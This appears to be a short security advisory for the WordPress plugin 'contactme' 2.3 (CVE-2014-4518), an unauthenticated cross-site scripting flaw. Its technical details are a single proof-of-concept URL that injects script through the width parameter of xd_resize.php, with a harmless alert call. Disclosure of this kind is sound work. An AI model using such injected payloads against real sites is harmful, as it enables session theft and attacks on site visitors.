Wp Plugin Contactme

Plugin Details

Plugin Name: wp-plugin : contactme
Effected Version : 2.3 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2014-4518
Identified by : Prajalkulkarni
WPScan Reference URL

Disclosure Timeline

Technical Details

http://127.0.0.1/wordpress/wp-content/plugins/contactme/xd_resize.php?width=1%27}%29%3C/script%3E%3Cscript%3Ealert%282%29%3C/script%3E&height=2